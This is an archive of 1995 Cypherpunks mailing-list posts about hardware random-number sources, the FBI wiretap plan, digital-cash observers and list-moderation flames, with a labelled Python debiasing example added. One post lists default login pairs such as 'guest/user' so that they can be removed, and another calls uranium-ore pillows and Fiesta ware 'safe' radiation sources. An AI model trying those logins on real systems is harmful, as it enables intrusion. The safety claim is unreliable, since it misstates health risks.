said, never underestimate the effort your adversary will go to in order
to read your traffic.

I'll stick to recommending radioactive sources for now. Quantum
mechanics is your friend, and detectors from places like Aware are
cheap.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:35 +0800
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031439.JAA08779@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Jeffers writes:
> Enzo Michelangeli writes:
> 
> >In any case, before Perry (rightly) send us stern reminders of the scarce
> >crypto relevance of this thread, let's take it out of Cypherpunks and,
> >if someone is interested, let's continue by e-mail.
> 
>    Perry is again narrowly defining allowable speech on Cypherpunks.
> Encryption becomes a trivial topic if its best medium is taken by the
> States. Perry is still in his "only encryption algorithms in C is a
> proper topic for Cypherpunks" mode.

No, I don't think that, Mr. Jeffers, but I must admit that my opinion
is that random political crap (NOT careful announcements by the likes
of jya@pipeline.com of reprints of articles on the new FBI wiretap
garbage) doesn't belong. 

> This is a direction that if followed
> would take the vitality and relevance out of the Cypherpunks list. Perry
> does a disservice for Cypherpunks.

I'm sorry, but you do a disservice to the cause of freedom. People are
trying to get work done to actually get cryptographic systems written,
deployed, and popularized, and the sort of crap that fills this place
periodically prevents people from working together towards that
end. If you want to talk about politics, go to Libernet or some such. 

Tim May will doubtless disagree, but he has nothing else to do in life
than read the net so his incentives to see traffic minimized aren't
the same as other people's.

>    Since when did Cypherpunks become the mailing list fit for Perry?

Look, it's simple. If you want the FBI and NSA to win, post lots of
crap here. Nothing will help them out more than clogging one of the
few communications channels available to people interested in
spreading cryptography. If you are really successful, all the smart
people will leave (as has happened in waves before -- the losses of
Steve Bellovin and (effectively) Phil Karn are still felt) and you
will have totally destroyed the channel.

> we must also take the time and trouble to occasionally tell Perry to
> shove his opinions up his ass.

If you want the anti-crypto people to win, nothing can help nearly so
much as your attitude. I'm glad to see what side you are on.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:32 +0800
To: futplex@pseudonym.com
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <199511031009.FAA11845@opine.cs.umass.edu>
Message-ID: <199511031440.JAA08790@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Perry recently recommended the use of background-radiation detectors as 
> good cheap true RNGs. Properly deployed cryptography generally depends upon
> excellent PRNGs, or preferably hardware RNGs.

Just one comment -- I think one is better off with a tiny cheap
radiation source when using such a system than in depending on
background, but the point is the same...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 3 Nov 1995 23:29:56 +0800
To: cypherpunks@toad.com
Subject: Kallstrom Calls All Calls Tappable
Message-ID: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-3-95. Wash Post:

   "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]


   James Kallstrom, assistant FBI director in charge of the
   New York field division, argues that the proposal would in
   fact reduce the FBI's surveillance authority. "Today ... we
   could tap all the phones in the United States," he said,
   referring to older, pre-digital technology. Under the plan,
   the FBI's surveillance ability would shrink to a maximum of
   1 percent of simultaneous telephone calls from any one
   telephone switch, he said.

   Kallstrom said a typical central switching office in New
   York that serves 50,000 telephone lines has a capacity to
   carry only 5,000 calls simultaneously. It is the latter
   number, not the former, he said, on which the FBI bases its
   calculations. So the highest level of simultaneous
   surveillance in that area, he said, would be 50 lines.

   "We've never done that many" taps at one time, he said. But
   in a "worst-case scenario," such as a major act of
   terrorism, the agency might need such ability, he said. "I
   think it's a reasonable, minimal, conservative number."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Fri, 3 Nov 1995 23:19:58 +0800
To: lvhove&vnet3.vub.ac.be@vnet3.vub.ac.be
Subject: RE: Info needed on observers
Message-ID: <95Nov3.093928gmt+0100.53773@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...
>
>Many thanks in advance.

Leo,

The concept 'Wallet (Databases) with Observers' was introduced by
David Chaum and Torben Pryds Pedersen at Crypto '92. See the
proceedings of that conference. Put shortly, it is a method of preventing
double spending of digital cash, stored on a smart card, and still
provide full payer anonymity.

Since then, others have worked on improving the original protocol,
e.g. Ronald Cramer, Niels Ferguson and Stefan Brands. In particular
the system by Stefan Brands has drawn much attention since it was
said to offer "provable security". It is his protocol that is used in the
European project CAFE.

In CAFE, each user is thought to have a PDA (Personal Digital Assistant)
which stores the digital cash. The observer is a smart card that has to
be inserted into the PDA in order to spend that cash. I don't know how
far this project has come, implementation wise but I think another project,
called SWAP was about to test these electronic wallets in practise.

Regards,
/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Fri, 3 Nov 1995 23:31:56 +0800
To: Norman Hardy <norm@mediacity.com>
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <Pine.SUN.3.91.951103094647.25772G-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995, Norman Hardy wrote:

> Stanford University Book Store (on campus) has a bunch at about $49.

I just picked up a copy from Computer Book Works in NYC (On Warren Street 
between Church & Broadway near City Hall.)  They only had the softcover 
version there.

Now does anyone want my old 1st edition? :-)

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 23:32:45 +0800
To: cypherpunks@toad.com
Subject: Re: Kallstrom Calls All Calls Tappable
In-Reply-To: <199511031441.JAA18237@pipe2.nyc.pipeline.com>
Message-ID: <199511031451.JAA08816@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
>    "Privacy Groups Assail FBI's Wiretapping Plan" [Excerpt]
> 
>    James Kallstrom, assistant FBI director in charge of the
>    New York field division, argues that the proposal would in
>    fact reduce the FBI's surveillance authority.

Kallstrom is the guy who was using the example of snuff films (a known
urban legend) to try to FUD the audience at the Bar Association debate
into supporting key escrow.

It appears, by the way, that the FBI may have goofed here. Even Steve
Post, the morning classical radio announcer on WNYC-FM in New York,
was making fun of the FBI this morning.

[Let's try not to make this into an extensive thread. We all have work
to do. For example, I have a 4.4BSD IPSEC implementation in my
possession that I don't have time to integrate into NetBSD and FreeBSD
in the next few weeks. Any volunteers out there?]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Fri, 3 Nov 1995 23:55:13 +0800
To: perry@piermont.com
Subject: Re[2]: Radiation Detectors from Aware Electronics
Message-ID: <9510038154.AA815422683@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     Perry -
     
     Sorry for the rude question.  I have been following this thread 
     closely but must have missed the original message regarding using 
     radiation detectors to produce random numbers.
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Re: Radiation Detectors from Aware Electronics 
Author:  perry@piermont.com at internet
Date:    03-11-95 09:23


sharborth@hai-net.com writes:
>      So what does this have to do with this mailing list??
     
Generating good random numbers is key to operating a solid 
cryptographic system. I've argued that computer interfaced radiation 
detectors are the optimal way of generating such numbers because they 
are hard to screw up -- biased diode noise and other sources are too 
easy to misdesign or misuse. Aware is a source of such detectors.
     
Perry
     
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned. 
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 4 Nov 1995 12:15:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Sources of randomness
In-Reply-To: <199511031427.JAA08758@jekyll.piermont.com>
Message-ID: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Perry E. Metzger wrote:

> I'll stick to recommending radioactive sources for now. Quantum
> mechanics is your friend, and detectors from places like Aware are
> cheap.
What prices have you got listed? Is the equipment sensitive enough to get 
lots of entropy from a normal environment or do you need artificial sources
of radioactivity? (easy, safe and cheap enough to get?)
Got any clues on random bits vs. time?

Someone said this was discussed before, I caught the thread on the 
detector being listed but not any discussion of the product itself. Could 
anyone post an approx date so I could go look it up on the archive?
Gracias.
Interesting stuff.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Sat, 4 Nov 1995 12:14:15 +0800
To: edge@got.net>
Subject: Re[2]: FBI seeks huge wiretapping system
Message-ID: <9510038154.AA815422767@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: Re: FBI seeks huge wiretapping system 
Author:  Jay Campbell <edge@got.net> at internet
Date:    03-11-95 06:08


>I was being facetious. The point is that the government has no 
>inherent right to tap our phones -- indeed, it didn't do so for nearly 
>the first 200 years of our existence, and we did just fine -- better, 
>in fact. 
     
It is a well-known fact that it was common practice for NSA operatives to
                                                        ^^^
masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
                            ^^^^^^
I think you'll find the NSA was not in existence in the 1800's.


to intercept communications between targeted parties. This practice lost 
popularity towards the end of the century with the advent of boxed cereal, 
and with it the Lone Ranger Decoder Ring, since the operatives were too 
underfunded to afford anything more than oatmeal.
     
[ducks]
--
   Jay Campbell                edge@got.net - Operations Manager 
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node 
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
     
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:02:29 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: video as a source of public randomness
Message-ID: <acbf861a06021004706b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 11/3/95, Tim Philp wrote:
>        Would not generating random numbers using video sources be
>susceptible to the same 'external' influences as generating random numbers
>from radio static? External RF fields could skew the 'randomness' of the
>data.

Do a thought experiment, if not an actual experiment.

Tune your t.v. to an unused channel. Use no antenna, or perhaps just small
rabbit ears. Notice the swirl of snow (as in "Snow Crash"). Imagine
sampling bits from this snowstorm, perhaps 10 per frame. Apply the usual
tricks to remove biases in one direction or another (*) and apply hashes as
desired to distill bits of entropy.

(* Such as von Neumann's scheme to turn even biased coins into "fair"
sources: toss a coin twice and let H T be a 1 and T H be a 0.)

To complete the thought experiment: Imagine the difficulty of an attacker
being able to modulate this snowstorm in any predictable way. Imagine the
difficulty when the antenna input has been disconnected, or the rabbit ears
moved by air currents in the room, or....

"All crypto is economics." The cost of an attack based on modulating this
source of randomness would be in the tens of billions of dollars, or more,
and likely impossible at any cost at this time. (Depending on the sampling
details, the antenna input, etc. I'm not saying a black bag job could not
be done to alter the inputs to the t.v., just that external RF manipulation
is unlikely in the extreme to be economically feasible.)


>        As another thought, has anyone done any work on RNGs involving
>chaotic processes such as fluid dynamics and turbulent flow? I suspect
>that pressure, or other parameter variances, in turbulent flow could yield
>good random numbers. As a bonus, these parameters are easily measurable
>without special, exotic, equipment and should be inexpensive

Ignoring the work allegedly done on "chaotic encryption," the RF method
described above essentially is relying on turbulence: the atmospheric
variations ("spherics," "whistlers," are some of the buzz words) affect the
snowstorm. Also, the rabbit ear antennas move in response to room air
currents.

Again, all unpredictable. (And as I noted above, sampling strategy is
important...)

I  don't plan to belabor this point. Radioactive decay sources are
certainly fine, though not likely to be purchased by most people. (I have
nothing against radioactive decay, as some of you may know--it made my
career.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

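The von Neumann pairing and hash distillation described in the post above, as an added example that is not part of the original message. The biased input is constructed with a seeded PRNG standing in for sampled snow bits, and SHA-256 with a 2:1 compression ratio is this example's own choice; the post names no hash.

```python
import hashlib
import random


def von_neumann(bits):
    """Von Neumann's scheme as stated in the post: read the samples in
    non-overlapping pairs, emit 1 for (1, 0) and 0 for (0, 1), and discard
    (0, 0) and (1, 1). The output is unbiased only if samples are independent."""
    out = []
    for i in range(0, len(bits) - 1, 2):
        first, second = bits[i], bits[i + 1]
        if first != second:
            out.append(first)
    return out


def fraction_of_ones(bits):
    return sum(bits) / len(bits) if bits else 0.0


def biased_samples(n, p_one, seed):
    """Constructed stand-in for thresholded 'snow' samples: independent bits
    that come up 1 with probability p_one. The seeded PRNG only makes the
    demonstration repeatable; it is not an entropy source."""
    rng = random.Random(seed)
    return [1 if rng.random() < p_one else 0 for _ in range(n)]


def pack_bits(bits):
    """Pack bits MSB-first into bytes, dropping an incomplete final byte."""
    usable = len(bits) - len(bits) % 8
    packed = bytearray()
    for i in range(0, usable, 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        packed.append(byte)
    return bytes(packed)


def distill(bits, block_bits=512):
    """Hash each full block of debiased bits down to 256 bits, a conservative
    2:1 compression. Leftover bits that do not fill a block are not used."""
    out = b""
    for i in range(0, len(bits) - block_bits + 1, block_bits):
        out += hashlib.sha256(pack_bits(bits[i:i + block_bits])).digest()
    return out


if __name__ == "__main__":
    raw = biased_samples(200_000, 0.8, seed=1995)
    fair = von_neumann(raw)
    print("raw ones:      %.3f over %d bits" % (fraction_of_ones(raw), len(raw)))
    print("debiased ones: %.3f over %d bits" % (fraction_of_ones(fair), len(fair)))
    print("distilled:     %d bytes" % len(distill(fair)))

    # Failure mode: the scheme removes bias, not correlation. A perfectly
    # alternating (fully predictable) stream passes every pair through and
    # yields a constant output.
    correlated = [0, 1] * 1000
    print("alternating input ->", set(von_neumann(correlated)))
```

With a source that is 80% ones, only about 16% of the raw bits survive the pairing step, which is the price of removing the bias without knowing its size.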





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 12:10:04 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
Message-ID: <acbf8a88070210047acb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:48 PM 11/3/95, Ray Arachelian wrote:


>Now does anyone want my old 1st edition? :-)

I am interested. I will trade five (5) slightly used prime numbers for it.

(Has anybody ever thought about using prime numbers as a medium of barter
in a digital economy? Think of the labor that would be saved if we all
didn't have to compute our own!! :-})

--Klaus! von Used Primes

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Sat, 4 Nov 1995 01:15:30 +0800
To: tony266@vabeach.email.net
Subject: Re: What!!!
In-Reply-To: <9511021825.S84530450@vabeach.email.net>
Message-ID: <9511031023.ZM14801@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


tony266 said...
] Can someone tell me this cypherpunks is all about???

the great Dr Fred Cohen debate.  oh, and an occasional comment upon
encryption and security... ;-)

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@Cymru.COM        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 14:27:29 +0800
To: perry@piermont.com
Subject: Physician, Heal Thyself
Message-ID: <acbf8c7e08021004f0bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 PM 11/3/95, Perry E. Metzger wrote:

>Tim May will doubtless disagree, but he has nothing else to do in life
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>than read the net so his incentives to see traffic minimized aren't
>the same as other people's.


Perry, would you please knock off the drone of snide remarks about me? I
mostly don't respond to your posts. You often make very good points, but at
other times you demonstrate a shrillness and apparent lack of socialization
that I find appalling.

Your snide remarks are, to use your own rhetoric, "wasteful of bandwidth."
They are also tacky, childish, and pointless.

You are often quick to say "What has this got to do with Cypherpunks?," but
you yourself are perfectly willing to rant on about Nietzsche, the East
Germans, and Louis Freeh. Physician, heal thyself.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 4 Nov 1995 00:30:23 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Sources of randomness
In-Reply-To: <Pine.3.89.9511030915.B49857-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951103102756.19997B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> 
> 
> On Fri, 3 Nov 1995, Perry E. Metzger wrote:
> 
> > I'll stick to recommending radioactive sources for now. Quantum
> > mechanics is your friend, and detectors from places like Aware are
> > cheap.
> What prices have you got listed? Is the equipment sensitive enough to get 
> lots of entropy from a normal environment or do you need artificial sources
> of radioactivity? (easy, safe and cheap enough to get?)


Safe, easy-to-obtain gamma sources:  orange fiesta-ware pottery (at flea 
markets), old-style Coleman lantern mantles (not sure about the new 
ones), uranium-ore "health pillows" (Sunshine Mine, 408-225-3670).

-bd

> Got any clues on random bits vs. time?
> 
> Someone said this was discussed before, I caught the thread on the 
> detector being listed but not any discussion of the product itself. Could 
> anyone post an approx date so I could go look it up on the archive?
> Gracias.
> Interesting stuff.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 5 Nov 1995 01:02:06 +0800
To: Gary Jeffers <gjeffers@socketis.net>
Subject: [noise] Re: censored with Perrymoose
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <Pine.3.89.9511031008.C49857-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 3 Nov 1995, Gary Jeffers wrote:

>    Perry is again narrowly defining allowable speech on Cypherpunks.

Killfiles exist. Judging by the amount of ranting, raving, paranoia and 
please help!!! posts, isn't it inevitable that you'll get some shut up
posts too? They make for entertaining flamewars (remember "my operating 
system is better than yours!!"? groan ). The frequency of [noise] postings 
might even be considered a decent PRNG.

Shut up shutting up ;->




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 4 Nov 1995 00:50:07 +0800
To: cypherpunks@toad.com
Subject: Re: Bruce Schneier's Applied Cryptography, 2nd Edition
In-Reply-To: <acbe05a801021004ca84@DialupEudora>
Message-ID: <199511031547.KAA07609@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:
 > Now does anyone want my old 1st edition? :-)

I intend to donate mine to a local library. I'd like to think that
some bright high schooler, or junior high schooler even, might get the
crypto bug a little earlier than I did.

I'll try to persuade them to leave a copy of the errata stapled to the
inside back cover.  Heck, if you have the cash flow*, donate a 2nd
edition instead.

nathan
* or the need for a $60 tax shelter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 05:30:00 +0800
To: cypherpunks@toad.com
Subject: Re: video as a source of public randomness
Message-ID: <acbf9287090210045bcb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:08 PM 11/3/95, Perry E. Metzger wrote:
>Timothy C. May writes:
>> I  don't plan to belabor this point. Radioactive decay sources are
>> certainly fine, though not likely to be purchased by most people.
>
>Video digitization equipment connected to TV tuners turned to dead air,
>your suggestion, are equally unlikely to be purchased by most
 ^^^^^^^^^^^^^^^^
>people. The geiger counters are very simple and cheap, too.


It is not correct to call this my "suggestion." I was responding to a
previous post by Andrew Isaacson who said: "How useful would it be to use a
video stream as a source of random input to something like /dev/random?
I'm thinking along the lines of a Connectix QuickCam (sp?) or the cool
videocam that comes with the Indy...."

I was commenting on the sources of randomness, such as atmospheric RF
variations, antenna configuration, tuner sensitivity, amplifier noise,
etc., that would make prediction of snow bits very difficult.

As to suggesting setting the tuner to dead air, this was just one facet of
the discussion.

I have no brief with any of the proposed schemes: nearly any are better
than what we have now, if widely deployed and suitably used.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Nov 1995 05:26:40 +0800
To: cypherpunks@toad.com
Subject: Re: censored with Perry
Message-ID: <199511031858.KAA24013@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
>>    Perry is again narrowly defining allowable speech on Cypherpunks.
>> Encryption becomes a trivial topic if its best medium is taken by the
>> States. Perry is still in his "only encryption algorithms in C is a
>> proper topic for Cypherpunks" mode.
>
>No, I don't think that, Mr. Jeffers, but I must admit that my opinion
>is that random political crap (NOT careful announcements by the likes
>of jya@pipeline.com of reprints of articles on the new FBI wiretap
>garbage) doesn't belong. 

Well, Perry, my opinion is that there is far too much noise on this list 
as it is.  I have already seen my words drowned out by bellyaching over 
next to nothing.

As one of the many non-Americans on this list, I find US policy and
politics simply _amusing_, but certainly not in the least bit relevant to
nearly anything that I do. 

>> This is a direction that if followed
>> would take the vitality and relevance out of the Cypherpunks list. Perry
>> does a disservice for Cypherpunks.
>
>I'm sorry, but you do a disservice to the cause of freedom. People are
>trying to get work done to actually get cryptographic systems written,
>deployed, and popularized, and the sort of crap that fills this place
>periodically prevents people from working together towards that
>end. If you want to talk about politics, go to Libernet or some such. 

Perry, you put an interesting twist on what the agenda of most people on
this list is.  It is not "getting cryptographic systems written, deployed,
and popularized."  It's about getting people to learn how to protect their
privacy and to see that their self-interest is served by having privacy. 

That's much more than "writing code".  If you have an insecure machine, a 
machine on which I can monitor your keystrokes as you enter your pass 
phrase, what good is strong crypto??

Somewhere between diddly and squat?

>>    Since when did Cypherpunks become the mailing list fit for Perry?
>
>Look, it's simple. If you want the FBI and NSA to win, post lots of
>crap here. Nothing will help them out more than clogging one of the
>few communications channels available to people interested in
>spreading cryptography. If you are really successful, all the smart
>people will leave (as has happened in waves before -- the losses of
>Steve Bellovin and (effectively) Phil Karn are still felt) and you
>will have totally destroyed the channel.

What would Perry have us do??  What does he want??  Does he want all of us
to order radiation detectors to beef up our random number generators?? 

Talk about a red herring!!

How about this instead Perry?  How about if you suggest that everyone make
sure that every Network which a machine connects to, and every other
trusted Network has removed the username/password combinations,
"tech/support", "LAN/admin", and "guest/user". 

This is easy to do, and is a solid recommendation. Unless the almighty
"Perry" would rather that you NOT worry about simple security matters
which protect privacy and are within anyone's control. 

>> we must also take the time and trouble to occasionally tell Perry to
>> shove his opinions up his ass.
>
>If you want the anti-crypto people to win, nothing can help nearly so
>much as your attitude. I'm glad to see what side you are on.

There's lots of things I could think of doing to Perry's ass, and shoving 
his opinions is but one of them.

It was hard enough for me as a Canadian to watch 3 out of 5 Francophones
vote to separate from Canada and form their own nation. And to then watch
as two leaders from within English Canada -- Preston Manning who runs the
Reform Party, and Ralph Klein, who is Premier of Alberta -- breach
protocol and insult the peoples of Quebec by discussing, commenting and
gloating over the overall election results even before concession speeches
by Bouchard and Parizeau.

And I groaned later when Parizeau said that the overall vote squeaker was
a result of "money and the ethnic vote."  Touche. 

But this is nothing in comparison to listening to some jackass talk out 
of both sides of his mouth, while he deliberately attempts to steer 
people away from what the MAJORITY of posters to this list have a strong 
common conviction about.  Securing their systems and their personal privacy.

It might be a rag tag bunch with differing political ideologies, but one 
idea brings all of us together here.

Except for one ... jackass.

And yep, I'm back after a brief silence.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 4 Nov 1995 01:18:18 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <199511030524.VAA03406@ix5.ix.netcom.com>
Message-ID: <9511031621.AA11770@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>>by people as well as EARNED by people.  Most payers have easily 
>>detectible physical presence and assets that can easily be attached by 
>>regulators.   It will be a cold day before, e.g., my employer agrees not 
>>to report my earnings.  And the same is true for most employers in most 
>>industries.  

>Unfortunately, this is true, at least for people whose employers are
>subject to income tax somewhere.  Taxing businesses doesn't make sense
>economically - you could collect almost as much money with far less disruption
>to the underlying economy by taxing it as wages for workers and

Why unfortunately? I happen to consider that our modern social economy
is a high point of civilisation. It is certainly a tremendous achievement.
We can educate the entire population, provide them with health care,
prevent famine and provide protection against crime and aggression by
other states. All in all rather a good deal.

While one might wish to personally avoid paying taxes there are no benefits if 
everyone avoids paying taxes. There are significant areas of the economy
which can only be funded through social mandates, roads for example.
While there are fringe political elements who put forward alternative models
I find them no more convincing than the claims of the Marxists who made
similarly ideologically based assertions not so long ago. There have at 
least been examples of Marxist states, even though they were not particularly
successful and rapidly degenerated into dictatorships.


I find the libertopian obsession with government oppression and complete
indifference towards corporate exploitation unsatisfactory. The truth is
that both are inevitably interlinked. For the "libertarian" it is 
unsatisfactory for the government to exploit consumers of utilities but
entirely satisfactory for corporations to do so should they have the chance.
The theoretical possibility of competition making this acceptable even
where there is no actual competition and hence no choice. This 
corporativist model accepts suppression of freedom provided it is to
commercial goals.

Consider the linkage between direct mail advertising and surveillance. It
is uneconomic for a government to trace the movements of every citizen.
The communist countries were brought down as much by the cost of the huge
surveillance administrations they constructed as anything else. In the
West we do not have government surveillance, we have direct mail marketers
do the job for government. Surveillance is made economic by getting the
citizen to subsidise it. It is naturally open for the government to apply
information collected by these people for their own purposes. It is a 
salable commodity and the government is a willing buyer. Furthermore there
is a sophisticated infrastructure in place to achieve these ends.

The extent of corporate surveillance goes unnoticed by most citizens. Few
people realise that when they use their credit card in a supermarket they
are supplying a direct mail marketing company with a profile of their
spending patterns. They are also providing a statement of where they are,
and indirectly their income, residence etc.

What is needed is stringent data protection laws which enforce the 
confidentiality of personal information. Note that both the SEPP and
STT payments systems conceal the credit card number from the merchant.
Cryptographic locks on individual parts of the picture are insufficient 
however. What is needed is laws which make the financing of the 
underlying architecture uneconomic.

		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 4 Nov 1995 05:43:58 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511021709.AA03831@zorch.w3.org>
Message-ID: <199511031743.MAA09044@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


hallam@w3.org writes:
>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

No it isn't.  If someone builds a "cone of silence", traditional audio
